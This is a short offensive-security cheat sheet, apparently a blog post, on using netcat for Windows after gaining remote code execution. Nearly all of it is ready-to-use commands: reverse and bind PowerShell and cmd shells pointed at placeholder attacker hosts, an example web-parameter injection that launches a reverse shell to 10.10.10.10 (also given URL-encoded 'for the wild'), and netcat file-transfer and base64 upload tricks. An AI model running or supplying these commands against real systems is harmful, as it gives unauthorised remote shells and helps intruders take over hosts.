Windows Post Exploitation Shells and File Transfer with Netcat for Windows

The Problem

We know the situation all to well, we have remote code execution and can upload and/or write files through a temperamental connection but want something a little more robust, something like netcat that always comes in so damn handy when pwing Unix systems.

The Solution — Netcat for Windows

Get the 32bit version here:int0x33/nc.exe
Netcat for windows 32/64 bit. Contribute to int0x33/nc.exe development by creating an account on GitHub.github.com

And the 64bit version here:int0x33/nc.exe
Netcat for windows 32/64 bit. Contribute to int0x33/nc.exe development by creating an account on GitHub.github.com

Uploading Files

A good tip that often comes in handy is to base64 encode a file, then simply copy the base64 blob to a file via a vuln or RCE and either decode first or after depending on your RCE situation. If you try and copy a file as-is in many situations the troublesome contents like language operators or null bytes etc will break the connection, application or worse, crash the target host.

Reverse Powershell

#32bit
nc.exe $ATTACKER_HOST $ATTACKER_PORT -e powershell
#64bit
nc64.exe $ATTACKER_HOST $ATTACKER_PORT -e powershell

Example RCE on web app:

https://vulnerable.com?pageId=nc64.exe 10.10.10.10 1337 -e powershell

Of course in the wild, we would url encode it:

https://vulnerable.com?pageId=nc64.exe%2010.10.10.10%201337%20-e%20powershell

Bind Powershell

#32bit
nc.exe -l -p $LISTENPORT -e powershell
#64bit
nc64.exe -l -p $LISTENPORT -e powershell

Reverse Shell

#32bit
nc.exe $ATTACKER_HOST $ATTACKER_PORT -e cmd
#64bit
nc64.exe $ATTACKER_HOST $ATTACKER_PORT -e cmd

Bind Shell

#32bit
nc.exe -l -p $LISTENPORT -e cmd
#64bit
nc64.exe -l -p $LISTENPORT -e cmd

Transfer File

Sender (Unix)

nc $TARGET $PORT < $FILE

Receiver (Windows)

#32bit
nc.exe -l -p $LISTENPORT > $FILE
#64bit
nc64.exe -l -p $LISTENPORT > $FILE